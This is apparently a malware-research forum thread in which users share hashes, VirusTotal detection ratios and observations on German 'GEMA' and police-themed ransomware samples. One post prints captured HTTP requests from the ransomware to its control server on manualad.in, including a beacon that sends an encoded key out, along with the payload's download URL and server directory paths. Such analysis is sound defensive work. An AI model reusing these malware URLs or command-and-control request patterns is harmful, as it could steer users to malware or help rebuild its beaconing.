[rkhunter]

GEMA

MD5: 36C42DD50F28AEE2ACC8A20EBD43671F
1/43

[Xylitol]

GEMA, served via BH EK, come from manualad.in/6.exe


Gate on the same domain

Code: Select all

GET /fv79df.php?id=8065D52C494C59586441&cmd=img HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /fv79df.php?id=8065D52C494C59586441&cmd=geo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:42:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 37
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

..8..@../.'.{....\~.B..'...a.....X..6

---

GET /fv79df.php?id=8065D52C494C59586441&stat=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 4
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

..>.

---

GET /fv79df.php?id=8065D52C494C59586441&cmd=key&data=2:0:MDEyMzQ1Njc4OTU3OTYwNQ== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:47:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 4
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

..>.

VT: 2/43 >> https://www.virustotal.com/file/53a33ad ... /analysis/

Additional:

Code: Select all

• dns: 1 » ip: 188.190.126.171 - adresse: MANUALAD.IN
http://manualad.in/cgi-bin/
http://manualad.in/icons/
http://manualad.in/config/
http://manualad.in/error/
http://manualad.in/phpmyadmin/
http://manualad.in/squirrelmail/
http://manualad.in/server-status/

[rkhunter]

GEMA

MD5: 1c50b2118f2ab8f60d4223c1a1c016b5
4/42

[Striker]

Another ransom from a german warez site

Detection ratio: 5 / 43
MD5: 7db7bc92d6b9fc8d957dfa0dac29fcbe
VT: https://www.virustotal.com/file/f3e694a ... 331834189/

Bundespolizei Ransom:



Code to unlock: 0111222233334444 or something like that (16 chars)

[rkhunter]

GEMA

MD5: abac1b40d7629f76424faa5bc6b9424f
8/43

[rkhunter]

GEMA

MD5: b09e7d4723feb64e1967b0b21e7848f9
9/43

[rkhunter]

GEMA

MD5: 81F37A4C738C77E764CD707EC197AB73
2/43

[rkhunter]

Seems gema servers taken down...

[rkhunter]

German ransom

MD5: 97E7A6F1868F90716602B1A23C862ACD
3/43

[Maxstar]

I assume all three samples are identical, (...)

Yes these files are the same so far as I know. The came from one infected machine this thread .
I asked the TS to upload the quarantine folder of MBAM because the following post that I placed yesterday.